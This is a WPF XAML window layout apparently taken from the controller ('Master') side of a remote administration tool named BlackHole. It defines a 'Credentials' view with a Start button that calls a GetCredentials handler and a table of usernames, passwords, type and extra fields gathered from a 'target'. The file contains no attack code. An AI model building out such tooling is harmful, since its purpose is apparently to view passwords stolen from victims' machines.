BlackHole.Master/CredentialsWindow.xaml

<src:SlaveWindow x:Class="BlackHole.Master.CredentialsWindow"
        xmlns:src="clr-namespace:BlackHole.Master"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        xmlns:local="clr-namespace:BlackHole.Master"
        mc:Ignorable="d"
        Title="Credentials" Height="800" Width="1000">
    <Grid>
        <Grid.RowDefinitions>
            <RowDefinition Height="Auto" />
            <RowDefinition Height="*" />
            <RowDefinition Height="Auto" />
        </Grid.RowDefinitions>
        <GroupBox Grid.Row="1" Header="Credentials"  Margin="10">
            <Grid>
                <Button Content="Start" HorizontalAlignment="Left" Margin="10,10,0,0" VerticalAlignment="Top" Width="75"  Click="GetCredentials"/>
                <ListView x:Name="CredentialsList" ItemsSource="{Binding Items}"  Margin="10,35,10,10" ScrollViewer.VerticalScrollBarVisibility="Visible">
                    <ListView.View>
                        <GridView>
                            <GridViewColumn Header="UserName" Width="200" DisplayMemberBinding="{Binding Path=[UserName]}" />
                            <GridViewColumn Header="Password" Width="200" DisplayMemberBinding="{Binding Path=[Password]}" />
                            <GridViewColumn Header="Type" Width="100" DisplayMemberBinding="{Binding Path=[Type]}" />
                            <GridViewColumn Header="Extra" Width="200" DisplayMemberBinding="{Binding Path=[Extra]}" />
                        </GridView>
                    </ListView.View>
                </ListView>
            </Grid>
        </GroupBox>
        <ContentPresenter Grid.Row="2" x:Name="TargetStatusPresenter" ContentTemplate="{StaticResource TargetSlaveStatusBar}" />
    </Grid>
</src:SlaveWindow>
